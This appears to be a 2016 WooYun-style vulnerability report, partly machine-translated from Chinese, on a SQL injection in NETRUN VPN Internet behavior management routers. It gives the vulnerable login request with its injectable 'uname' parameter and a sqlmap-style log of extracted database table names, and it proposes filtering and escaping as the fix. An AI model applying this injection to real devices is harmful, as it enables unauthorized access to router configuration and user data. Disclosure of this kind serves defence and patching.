漏洞标题 NETRUN VPN Internet行为管理路由器通用注入 相关制造商 南京网润科技有限公司 漏洞作者 Aasron 提交时间 2016-05-10 20: 40 公共时间 2016-06-27 16: 20 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 字符类型注入,注入技术,SQLit 漏洞详细信息
NETRUN VPN Internet行为管理路由器 GET /userAuth.egi?uname=admin&upwd=123456 HTTP/1.1 主机: **。**。**。** 用户代理: Mozilla/5.0(Windows NT 6.1; WOW64; rv: 45.0)Gecko/20100101 Firefox/45.0 接受: */* Accept-Language: zh-CN,zh; q=0.8,en-US; q=0.5,en; Q=0.3 Accept-Encoding: gzip,deflate X-Requested-With: XMLHttpRequest Referer:http://**。**。**。**/login.esp Cookie: _appwebSessionId_=34a5859e906dad5ee9f885b79496a14f 连接:关闭 注射参数#uname 由于频率太快,访问受到限制,因此延迟用于注入。
漏洞证明:
[17: 43: 17] [INFO]获取数据库:'SQLite_masterd的表 [17: 43: 17] [INFO]获取数据库'SQLit的表数 [17: 43: 17] [INFO]检索到: 39 [17: 43: 19] [INFO]检索到: app_group_t [17: 43: 33] [INFO]检索到: app_obj_t [17: 43: 45] [INFO]检索到: app_user_t [17: 43: 59] [INFO]检索到: apptc_obj_t [17: 44: 14] [INFO]检索到: broad_group_t [17: 44: 31] [INFO]检索到: broad_obj_t 从对等方接收数据时失败 [17: 47: 51] [INFO]检索到: fw_policy_t [17: 48: 05] [INFO]检索到: fw_time_t [17: 48: 18] [INFO]检索到: group_t [17: 48: 27] [INFO]检索到: group_user_t [17: 48: 43] [INFO]检索到: if_config_t [17: 48: 58] [INFO]检索到: ip_mac_t [17: 49: 10] [INFO]检索到: ipsec_gateway_t [17: 49: 31] [INFO]检索到: ipsec_tunnel_t [17: 49: 49] [INFO]检索到: nat_conf_t [17: 50: 04] [INFO]检索到:对象 附件案地址: ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / ** ** ** ** / 修理计划: 过滤,逃脱 版权声明:请注明出处Aasron @乌云